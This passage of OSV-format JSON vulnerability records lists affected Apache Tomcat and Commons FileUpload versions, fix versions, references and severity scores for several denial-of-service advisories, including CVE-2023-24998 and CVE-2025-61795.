"10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "last_known_affected_version_range": "\u003c= 10.1.41", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.M1" }, { "fixed": "9.0.106" } ] } ], "versions": [ 
"9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "last_known_affected_version_range": "\u003c= 9.0.105", "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", 
"8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.0" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.0", "8.5.100", "8.5.11", "8.5.12", "8.5.13", "8.5.14", "8.5.15", "8.5.16", "8.5.19", "8.5.2", "8.5.20", "8.5.21", "8.5.23", "8.5.24", "8.5.27", "8.5.28", "8.5.29", "8.5.3", "8.5.30", "8.5.31", "8.5.32", "8.5.33", "8.5.34", "8.5.35", "8.5.37", "8.5.38", "8.5.39", "8.5.4", "8.5.40", "8.5.41", "8.5.42", "8.5.43", "8.5.45", "8.5.46", "8.5.47", "8.5.49", "8.5.5", "8.5.50", "8.5.51", "8.5.53", "8.5.54", "8.5.55", "8.5.56", "8.5.57", "8.5.58", "8.5.59", "8.5.6", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.8", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.9", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/06/GHSA-h3gc-qfqq-6h8f/GHSA-h3gc-qfqq-6h8f.json" } } ], "references": [ { "type": "ADVISORY", "url": 
"https://nvd.nist.gov/vuln/detail/CVE-2025-48988" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/2b0ab14fb55d4edc896e5f1817f2ab76f714ae5e" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/cdde8e655bc1c5c60a07efd216251d77c52fd7f6" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/ee8042ffce4cb9324dfd79efda5984f37bbb6910" }, { "type": "PACKAGE", "url": "https://github.com/apache/tomcat" }, { "type": "WEB", "url": "https://lists.apache.org/thread/nzkqsok8t42qofgqfmck536mtyzygp18" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00009.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2025/06/16/1" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2025-06-16T17:50:09Z", "nvd_published_at": "2025-06-16T15:15:24Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" }, { "type": "CVSS_V4", "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hfrx-6qgj-fp6c", "published": "2023-02-20T18:30:17Z", "modified": "2025-11-04T17:02:38.358233Z", "aliases": [ "CVE-2023-24998" ], "related": [ "CGA-vhv7-2gww-h7x4" ], "summary": "Apache Commons FileUpload denial of service vulnerability", "details": "Apache Commons FileUpload before 1.5 does not limit the number of request parts to be processed resulting in the possibility of an attacker triggering a DoS with a malicious upload or series of uploads. 
Note that, like all of the file upload limits, the new configuration option (FileUploadBase#setFileCountMax) is not enabled by default and must be explicitly configured.", "affected": [ { "package": { "name": "commons-fileupload:commons-fileupload", "ecosystem": "Maven", "purl": "pkg:maven/commons-fileupload/commons-fileupload" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "0" }, { "fixed": "1.5" } ] } ], "versions": [ "1.0", "1.0-beta-1", "1.0-rc1", "1.1", "1.1.1", "1.2", "1.2.1", "1.2.2", "1.3", "1.3.1", "1.3.1-jenkins-1", "1.3.1-jenkins-2", "1.3.2", "1.3.3", "1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.5" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.2", "10.1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.0-M5" } ] } ], "versions": [ "11.0.0-M3", "11.0.0-M4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": 
"pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.85" }, { "fixed": "8.5.88" } ] } ], "versions": [ "8.5.85", "8.5.86", "8.5.87" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-coyote", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-coyote" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.71" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.5" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", 
"10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.2", "10.1.4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M2" }, { "fixed": "11.0.0-M5" } ] } ], "versions": [ "11.0.0-M3", "11.0.0-M4" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.85" }, { "fixed": "8.5.88" } ] } ], "versions": [ "8.5.85", "8.5.86", "8.5.87" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0-M1" }, { "fixed": "9.0.71" } ] } ], "versions": [ "9.0.0.M1", "9.0.0.M10", "9.0.0.M11", "9.0.0.M13", "9.0.0.M15", "9.0.0.M17", "9.0.0.M18", "9.0.0.M19", "9.0.0.M20", "9.0.0.M21", "9.0.0.M22", "9.0.0.M25", "9.0.0.M26", "9.0.0.M27", "9.0.0.M3", "9.0.0.M4", "9.0.0.M6", "9.0.0.M8", "9.0.0.M9", "9.0.1", "9.0.10", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", 
"9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.8" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2023/02/GHSA-hfrx-6qgj-fp6c/GHSA-hfrx-6qgj-fp6c.json" } } ], "references": [ { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2023-24998" }, { "type": "WEB", "url": "https://github.com/apache/commons-fileupload/commit/e20c04990f7420ca917e96a84cec58b13a1b3d17" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/8a2285f13affa961cc65595aad999db5efae45ce" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/9ca96c8c1eba86c0aaa2e6be581ba2a7d4d4ae6e" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/cf77cc545de0488fb89e24294151504a7432df74" }, { "type": "WEB", "url": "https://github.com/apache/tomcat/commit/d53d8e7f77042cc32a3b98f589496a1ef5088e38" }, { "type": "WEB", "url": "https://www.debian.org/security/2023/dsa-5522" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-9.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-8.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-11.html" }, { "type": "WEB", "url": "https://tomcat.apache.org/security-10.html" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20241108-0002" }, { "type": "WEB", "url": "https://security.netapp.com/advisory/ntap-20230302-0013" }, { "type": "WEB", "url": "https://security.gentoo.org/glsa/202305-37" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2025/07/msg00008.html" }, { "type": "WEB", "url": "https://lists.debian.org/debian-lts-announce/2023/10/msg00020.html" }, { "type": "WEB", "url": 
"https://lists.apache.org/thread/4xl4l09mhwg4vgsk7dxqogcjrobrrdoy" }, { "type": "WEB", "url": "https://github.com/search?q=repo%3Aapache%2Ftomcat+util.http+path%3A%2F%5Eres%5C%2Fbnd%5C%2F%2F\u0026type=code" }, { "type": "PACKAGE", "url": "https://github.com/apache/commons-fileupload" }, { "type": "WEB", "url": "https://commons.apache.org/proper/commons-fileupload/security-reports.html" }, { "type": "WEB", "url": "http://www.openwall.com/lists/oss-security/2023/05/22/1" } ], "database_specific": { "cwe_ids": [ "CWE-770" ], "github_reviewed": true, "github_reviewed_at": "2023-02-22T00:12:07Z", "nvd_published_at": "2023-02-20T16:15:00Z", "severity": "HIGH" }, "severity": [ { "type": "CVSS_V3", "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H" } ] }, { "schema_version": "1.7.3", "id": "GHSA-hgrr-935x-pq79", "published": "2025-10-27T18:31:13Z", "modified": "2025-11-05T21:08:18.888100Z", "aliases": [ "CVE-2025-61795" ], "related": [ "CGA-7mvr-5m45-qj72", "CGA-8r8c-f385-rjq7", "CGA-9jp5-3v3c-f4mc", "CGA-g5qh-ggv5-g3xv", "CGA-j452-cfc3-8ffx", "CGA-q4w6-262v-263g", "CGA-v7h9-8q55-77cv" ], "summary": "Apache Tomcat Vulnerable to Improper Resource Shutdown or Release", "details": "If an error occurred (including exceeding limits) during the processing of a multipart upload, temporary copies of the uploaded parts written to disc were not cleaned up immediately but left for the garbage collection process to delete. Depending on JVM settings, application memory usage and application load, it was possible that space for the temporary copies of uploaded parts would be filled faster than GC cleared it, leading to a DoS.\n\nThis issue affects Apache Tomcat: from 11.0.0-M1 through 11.0.11, from 10.1.0-M1 through 10.1.46, from 9.0.0.M1 through 9.0.109.\n\nThe following versions were EOL at the time the CVE was created but are \nknown to be affected: 8.5.0 though 8.5.100. 
Other, older, EOL versions may also be affected.\nUsers are recommended to upgrade to version 11.0.12 or later, 10.1.47 or later or 9.0.110 or later which fixes the issue.", "affected": [ { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.12" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.11", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.47" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.45", "10.1.46", "10.1.5", "10.1.6", "10.1.7", "10.1.8", "10.1.9" ], "database_specific": { "source": 
"https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.40" }, { "fixed": "9.0.110" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.109", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", "8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", 
"8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.12" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", "11.0.0-M24", "11.0.0-M25", "11.0.0-M26", "11.0.0-M3", "11.0.0-M4", "11.0.0-M5", "11.0.0-M6", "11.0.0-M7", "11.0.0-M9", "11.0.1", "11.0.10", "11.0.11", "11.0.2", "11.0.3", "11.0.4", "11.0.5", "11.0.6", "11.0.7", "11.0.8", "11.0.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "10.1.0-M1" }, { "fixed": "10.1.47" } ] } ], "versions": [ "10.1.0", "10.1.0-M1", "10.1.0-M10", "10.1.0-M11", "10.1.0-M12", "10.1.0-M14", "10.1.0-M15", "10.1.0-M16", "10.1.0-M17", "10.1.0-M2", "10.1.0-M4", "10.1.0-M5", "10.1.0-M6", "10.1.0-M7", "10.1.0-M8", "10.1.1", "10.1.10", "10.1.11", "10.1.12", "10.1.13", "10.1.14", "10.1.15", "10.1.16", "10.1.17", "10.1.18", "10.1.19", "10.1.2", "10.1.20", "10.1.23", "10.1.24", "10.1.25", "10.1.26", "10.1.28", "10.1.29", "10.1.30", "10.1.31", "10.1.33", "10.1.34", "10.1.35", "10.1.36", "10.1.39", "10.1.4", "10.1.40", "10.1.41", "10.1.42", "10.1.43", "10.1.44", "10.1.45", "10.1.46", "10.1.5", "10.1.6", "10.1.7", 
"10.1.8", "10.1.9" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "9.0.0.40" }, { "fixed": "9.0.110" } ] } ], "versions": [ "9.0.1", "9.0.10", "9.0.100", "9.0.102", "9.0.104", "9.0.105", "9.0.106", "9.0.107", "9.0.108", "9.0.109", "9.0.11", "9.0.12", "9.0.13", "9.0.14", "9.0.16", "9.0.17", "9.0.19", "9.0.2", "9.0.20", "9.0.21", "9.0.22", "9.0.24", "9.0.26", "9.0.27", "9.0.29", "9.0.30", "9.0.31", "9.0.33", "9.0.34", "9.0.35", "9.0.36", "9.0.37", "9.0.38", "9.0.39", "9.0.4", "9.0.40", "9.0.41", "9.0.43", "9.0.44", "9.0.45", "9.0.46", "9.0.48", "9.0.5", "9.0.50", "9.0.52", "9.0.53", "9.0.54", "9.0.55", "9.0.56", "9.0.58", "9.0.59", "9.0.6", "9.0.60", "9.0.62", "9.0.63", "9.0.64", "9.0.65", "9.0.67", "9.0.68", "9.0.69", "9.0.7", "9.0.70", "9.0.71", "9.0.72", "9.0.73", "9.0.74", "9.0.75", "9.0.76", "9.0.78", "9.0.79", "9.0.8", "9.0.80", "9.0.81", "9.0.82", "9.0.83", "9.0.84", "9.0.85", "9.0.86", "9.0.87", "9.0.88", "9.0.89", "9.0.90", "9.0.91", "9.0.93", "9.0.94", "9.0.95", "9.0.96", "9.0.97", "9.0.98", "9.0.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat:tomcat-catalina", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat/tomcat-catalina" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "8.5.60" }, { "last_affected": "8.5.100" } ] } ], "versions": [ "8.5.100", "8.5.60", "8.5.61", "8.5.63", "8.5.64", "8.5.65", "8.5.66", "8.5.68", "8.5.69", "8.5.70", "8.5.71", "8.5.72", "8.5.73", "8.5.75", "8.5.76", "8.5.77", "8.5.78", "8.5.79", "8.5.81", "8.5.82", 
"8.5.83", "8.5.84", "8.5.85", "8.5.86", "8.5.87", "8.5.88", "8.5.89", "8.5.90", "8.5.91", "8.5.92", "8.5.93", "8.5.94", "8.5.95", "8.5.96", "8.5.97", "8.5.98", "8.5.99" ], "database_specific": { "source": "https://github.com/github/advisory-database/blob/main/advisories/github-reviewed/2025/10/GHSA-hgrr-935x-pq79/GHSA-hgrr-935x-pq79.json" } }, { "package": { "name": "org.apache.tomcat.embed:tomcat-embed-core", "ecosystem": "Maven", "purl": "pkg:maven/org.apache.tomcat.embed/tomcat-embed-core" }, "ranges": [ { "type": "ECOSYSTEM", "events": [ { "introduced": "11.0.0-M1" }, { "fixed": "11.0.12" } ] } ], "versions": [ "11.0.0", "11.0.0-M1", "11.0.0-M10", "11.0.0-M11", "11.0.0-M12", "11.0.0-M13", "11.0.0-M14", "11.0.0-M15", "11.0.0-M16", "11.0.0-M17", "11.0.0-M18", "11.0.0-M19", "11.0.0-M20", "11.0.0-M21", "11.0.0-M22", 